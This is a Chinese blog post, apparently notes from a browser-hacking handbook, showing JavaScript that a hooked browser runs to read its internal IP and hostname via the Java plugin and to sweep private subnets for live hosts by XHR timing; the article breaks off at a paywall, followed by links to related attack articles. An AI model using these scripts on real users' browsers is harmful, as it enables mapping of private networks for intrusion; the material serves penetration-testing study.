攻击网络

最新推荐文章于 2021-08-02 23:10:56 发布
最新推荐文章于 2021-08-02 23:10:56 发布
阅读量307 收藏
点赞数 1
分类专栏: 专栏 黑客攻防技术宝典——浏览器 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wk19951125/article/details/94603354
版权

攻击网络

识别目标

识别勾连浏览器的内部IP

JavaScript可以生成Java调用,从而通过JRE浏览器插件来执行。甚至还可以实例化Java的java.net.Socket类。通过这个类,JavaScript可以取得浏览器的内部IP和主机名称。

示例

  • 在Firefox 15之前的版本提取内部IP地址和主机名称
    var sock = new java.net.Socket();
var ip = "";
var hostname = "";
try {
     
	sock.bind(new java.net.InetSocketAddress('0.0.0.0',0));     //在本地计算机打开一个监听端口
	sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));     //连接
  ip = sock.getLocalAddress().getHostAddress();    //获取IP
  hostname = sock.getLocalAddress().getHostName();    //获取主机名称
}

工具

  • BeEF的Get System Info命令模块
识别勾连浏览器的子网

示例

//默认网关IP地址
var ranges = [
'192.168.0.0','192.168.1.0',
'192.168.2.0','192.168.10.0',
'192.168.100.0','192.168.123.0',
'10.0.0.0','10.0.1.0',
'10.1.1.0'
];
var discovered_hosts = [];
// XHR超时
var timeout = 5000;

function doRequest(host) {
   
	var d = new Date;
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = processRequest;
	xhr.timeout = timeout;
	
	function processRequest(){
   
		if(xhr.readyState == 4){
   
			var time = new Date().getTime() - d.getTime();
			var aborted = false;
			// 如果调用window.stop(),触发的是abort
			// http://www.w3.org/TR/XMLHttpRequest/#event-handlers
			xhr.onabort = function(){
   
				aborted = true;
			}
			
			xhr.onloadend = function(){
   
				if(time < timeout){
   
					// abort总在onloadend之前触发
					if(time > 10 && aborted === false){
   
						console.log('Discovered host ['+host+'] in ['+time+'] ms');
						discovered_hosts.push(host);
					}
				}
			}
		}
	}
	
	xhr.open("GET", "http://" + host, true);
	xhr.send();
}

var start_time = new Date().getTime();
function checkComplete(){
   
	var current_time = new Date().getTime();
	if((current_time - start_time) > timeout + 1000){
   
		// 结束挂起的XHR,尤其是在Chrome中
		window.stop();
		clearInterval(checkCompleteInterval);
		console.log("Discovered hosts:\n" + discovered_hosts.join("\n"));
	}
}

var checkCompleteInterval = setInterval(function(){
   checkComplete()}, 1000);
for (var i = 0; i < ranges.length; i++) {
   
	// 以下代码返回像192.168.0之类的
	var c = ranges[i].split('.')[0]+'.'+ ranges[i].split('.')[1]+'.&#
最低0.47元/天 解锁文章
你的名字5686
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
公司内网有一台Win10主机发起扫描僵尸网络,防火墙显示ip sweep attack攻击
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
09-18 2014
环景: win10 家庭版 IPguard管控客户端 问题描述: 公司内网有一台Win10主机发起扫描僵尸网络,防火墙显示Ip sweep attack攻击,造成该主机不能上网,已发起扫描就被防火墙加入黑名单,杀软未扫描出有异常 防火墙日志显示:攻击类型=“Ip sweep attack”, 槽位号=" ", CPU号=“3”, 接收接口="GE0/1/13 ", 协议=“UDP”, 攻击地址=“192.168.1.9:6881->116.7.213.44:6881”, 攻击开始时间=2021/09/
网络攻击原理及防范
爱意随风起,人生不可弃。
12-18 1741
文章目录典型的网络攻击类型扫描窥探IP SweepPort Scan拒绝服务攻击Fraggle攻击Land攻击SYN Flood攻击UDP/ICMP Flood攻击畸形报文攻击TCP Flag攻击IP分片攻击Tear Drop攻击Ping of Death攻击 典型的网络攻击类型 扫描窥探 扫描窥探是网络攻击的基础及前提。 IP Sweep 通过ping ip 寻找网络中在线的IP windo...
单行实现Ping Sweep
weixin_30336061的博客
09-26 719
这两天在做渗透测试,进入内网后需要大致判断一下里面有哪些机器,不想再传文件上去,就想了这个办法: C:\WINNT\System32>for /L %I in (1,1,254) do @FOR /F "tokens=3 usebackq delims=: " %J IN (`ping -w 100 -n 1 192.168.0.%I^|findstr "Reply"`) DO @ec...
DDOS攻击详解
开心的小包子
11-11 1357
Ddos的攻击方式有很多种,最基本的Dos攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。 在信息安全的三要素——“保密性”、“完整性”和“可用性”中,DoS(Denial of Service),即拒绝服务攻击,针对的目标正是“可用性”。该攻击方式利用目标系统网络服务功能缺陷或者直接消耗其系统资源,使得该目标系统无法提供正常的服务。 DDos攻击 Dd...
DDOS攻击方式总结 (转)
ai749499的博客
11-01 1988
作者:Lemon 本人近期一直在研究DDOS攻击,并通读了《破坏之王-DDOS攻击与防范》一书,书中对于DDOS的攻击方式与防范写的很详细,很推荐阅读,并针对本书中的DDOS攻击方式做了总结。 1、攻击网络宽带资源 1.1直接攻击 使用大量的受控主机向被攻击目标发送大量的网络数据包,以沾满被攻击目标的宽带,并消耗服务器和网络设备的网络数据处理能力,达到拒绝服务的目...
七种DDOS攻击方式总结
xianjie0318的博客
06-12 5349
摘要:为了全面的防御ddos攻击,管理者们做了很多努力,但是新型的攻击时不时就会出现,管理者们防不胜防。对此,以下总结了七种相对常见的攻击类型,希望能对网站的防御工作起到一点作用。关键词:信息安全  互联网的出现,实现了真正的全球村,它给人们带来的方便快捷,是以前无法想象的。但是也由于IP地址的短缺,大量带宽的损耗,以及编程技术的不足等等问题,现阶段的网络系统累积下了无数的漏洞。很多不法分子盯上了...
Metasploit中主机发现模块arp_sweep
Culprit的博客
02-28 6401
Metasploit 中提供了一些辅助模块可用于活跃主机的发现,这些模块位于Metasploit 源码路径的modules/auxiliary/scanner/discovery/ 目录中,主要有以下几个:arp_sweep、ipv6_multicast_ping、ipv6_neighbor、ipv6_neighbor_router_advetisement、 udp_probe、udp_swee...
网络安全入门11--暴力破解攻击专题概述
weixin_41176153的博客
05-27 624
matlab实现随机攻击网络节点+蓄意攻击网络节点(1)
热门推荐
XuXing的博客
12-13 1万+
在研究网络的鲁棒性的时候,我们往往会通过随机与蓄意攻击网络节点,观察网络效率的下降来进行后续研究。 代码如下: 函数Demo:testEglob(命名随意,只要与函数内的定义一致即可) 函数作用:计算当前网络网络效率 function Con_Index_NetEff = testEglob( A ) A_A = A; %% 保存原...
随机攻击方法
11-14
在复杂网络中对生成的简单网络图进行随机攻击和蓄意攻击,得到新的网络拓扑图
速达服务器应用程序错误,速达软件错误集锦及解决方法
weixin_36300831的博客
08-02 2459
《速达软件错误集锦及解决方法》由会员分享,可在线阅读,更多相关《速达软件错误集锦及解决方法(5页珍藏版)》请在人人文库网上搜索。1、一 登录1 服务器与客户端不在同一网域,连接被拒绝原因:只有net系列才允许跨网段访问解决办法:换net系列产品2 登录提示,index out of bounds,导航窗口空白原因:安装目录下,product.js文件内容为空解决办法:到正常的客户端复制produc...
NYOJ题目170网络的可靠性
weixin_30344795的博客
09-22 63
------------------------------- 无论哪一个坏掉了都能连通意味着不能存在只有一根线(度为1)的基站,所以统计一下度为1的点,然后为了节省将它们两两相连,如果是奇数的话剩下的那个没配对的就随便连连喽~ AC代码: 1 import java.util.Scanner; 2 3 public class Main { 4...
网络安全学习第10篇 - ping程序的实现,抓包分析ping数据包以及ping工具对于网络安全方面的威胁
一清道长的个人博客
05-28 3384
请结合附件:Ping的实现原理与ping.cpp的内容,编写一个程序,使其能够实现简单的ping的功能,即判断目标网站是否可以连接,然后通过Wireshark进行抓包分析其ICMP协议,指出哪个数据包是ping的请求(request),哪个数据包是对这个请求的回应(reply)(如果reply数据包存在的话)。 相关知识: ICMP (Internet Contr...
ping 攻击 Linux,Linux 环境实现ping攻击
weixin_39601794的博客
05-13 571
通过不断的ping局域网中的某个主机,可以达到几乎完全占用那个主机网速的效果,但自己的网速也废了,整个局域网的上网基本上也废来。所以这是一种同归于尽的攻击方式,实用性基本上不存在了。之所以做这件事,是因为最近在研读 TCP/IP详解卷一 这本书,所以用代码实现了ping的功能,并且稍加改进成为了ping攻击的代码。一、开发环境:Red Hat Enterprise Linux 6.0编译工具:GC...
matlab蓄意攻击网络
最新发布
06-24
首先,我们应该明确一点,matlab本身并不会蓄意攻击网络,因为它只是一款用于数学计算和数据分析的软件工具。然而,如果有人利用matlab进行网络攻击,那么这完全是该人的行为,而与matlab本身无关。 当然,matlab...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值